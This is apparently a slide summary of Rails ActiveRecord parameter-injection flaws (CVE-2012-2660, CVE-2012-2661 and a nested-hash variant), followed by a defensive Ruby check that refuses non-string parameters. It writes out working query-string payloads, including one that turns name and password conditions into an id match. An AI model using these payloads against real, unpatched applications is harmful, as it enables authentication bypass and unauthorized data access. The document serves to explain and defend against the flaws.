Rails Vulnerabilities Last Week: CVE-2012-2660, CVE-2012-2661
CVE-2012-2660
Allows unexpected "IS NULL" in queries
Affects Rails 2.x and 3.x

ActiveRecord Query:
    unless params[:name].nil?
      @user = User.where(:name => params[:name])
    end

Query Parameters:
    ?name[]
    {"name"=>[nil]}

ActiveRecord Query (after parameter parsing; [nil].nil? is false, so the where runs):
    unless [nil].nil?
      @user = User.where(:name => [nil])
    end

Resulting SQL:
    SELECT "users".* FROM "users" WHERE "users"."name" IS NULL
CVE-2012-2661
Allows some manipulation of the WHERE clause via "dotted" query keys
Affects Rails 3.x

ActiveRecord Query:
    User.where(:name => params[:name])

ActiveRecord Query (equivalent form with an explicit table-qualified column):
    User.where("users.name" => params[:name])

Query Parameters:
    ?name[users.id]=1
    {"name"=>{"users.id"=>"1"}}

ActiveRecord Query (after parameter parsing):
    User.where(:name => {"users.id" => "1"})

Resulting SQL:
    SELECT "users".* FROM "users" WHERE "users"."id" = 1
Unreleased Vulnerability
Allows some manipulation of the WHERE clause via nested hashes in query values
Affects Rails 2.3.x and 3.x

ActiveRecord Query:
    User.where(:name => params[:name], :password => params[:password])

Query Parameters:
    ?name[users][id]=1&password[users][id]=1
    {"name"=>{"users"=>{"id"=>"1"}}, "password"=>{"users"=>{"id"=>"1"}}}

ActiveRecord Query (after parameter parsing):
    User.where(:name => {"users"=>{"id"=>"1"}}, :password => {"users"=>{"id"=>"1"}})

Resulting SQL (the name and password conditions are both replaced by a condition on users.id):
    SELECT "users".* FROM "users" WHERE "users"."id" = 1 AND "users"."id" = 1
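All three slides share one root cause: a parameter the code expects to be a string arrives as an Array or a Hash and ActiveRecord's where() interprets the structure. The following is an added example, not code from the slides or from Rails, showing a controller-side check that only lets plain strings through to the conditions hash. It is plain Ruby with no Rails dependency; the parameter hashes are constructed here to mirror what the slides show Rack producing for each query string, and the helper names (scalar_param, safe_conditions, rejects?) are the example's own.

```ruby
# Raised when a query parameter is not the scalar the query expects.
class UnsafeQueryParam < ArgumentError; end

# Return params[key] only if it is a String; reject anything else.
# Arrays ([nil] from ?name[]) and Hashes ({"users.id"=>"1"} from
# ?name[users.id]=1, or nested hashes from ?name[users][id]=1) are refused,
# so they can never turn into "IS NULL" or a rewritten column reference.
def scalar_param(params, key)
  value = params[key]
  unless value.is_a?(String)
    raise UnsafeQueryParam, "#{key} must be a String, got #{value.class}"
  end
  value
end

# Build the hash that would be handed to User.where(...), but only after
# every requested value has been proven to be a String.
def safe_conditions(params, *keys)
  keys.each_with_object({}) { |k, h| h[k] = scalar_param(params, k.to_s) }
end

# Convenience predicate: true if the parameters would be refused.
def rejects?(params, *keys)
  safe_conditions(params, *keys)
  false
rescue UnsafeQueryParam
  true
end

# Constructed parameter hashes mirroring the slides' query strings.
PARAMS_IS_NULL    = { "name" => [nil] }                   # ?name[]
PARAMS_DOTTED_KEY = { "name" => { "users.id" => "1" } }   # ?name[users.id]=1
PARAMS_NESTED     = { "name"     => { "users" => { "id" => "1" } },
                      "password" => { "users" => { "id" => "1" } } }
                                                           # ?name[users][id]=1&password[users][id]=1
PARAMS_OK         = { "name" => "alice", "password" => "hunter2" }  # ordinary request

if __FILE__ == $PROGRAM_NAME
  [PARAMS_IS_NULL, PARAMS_DOTTED_KEY, PARAMS_NESTED].each do |p|
    puts "rejected: #{p.inspect}" if rejects?(p, :name)
  end
  puts "accepted: #{safe_conditions(PARAMS_OK, :name, :password).inspect}"
end
```

In a real controller the same check belongs before the where() call, with the rejection mapped to a 400 response; the where() argument is then guaranteed to contain only string values.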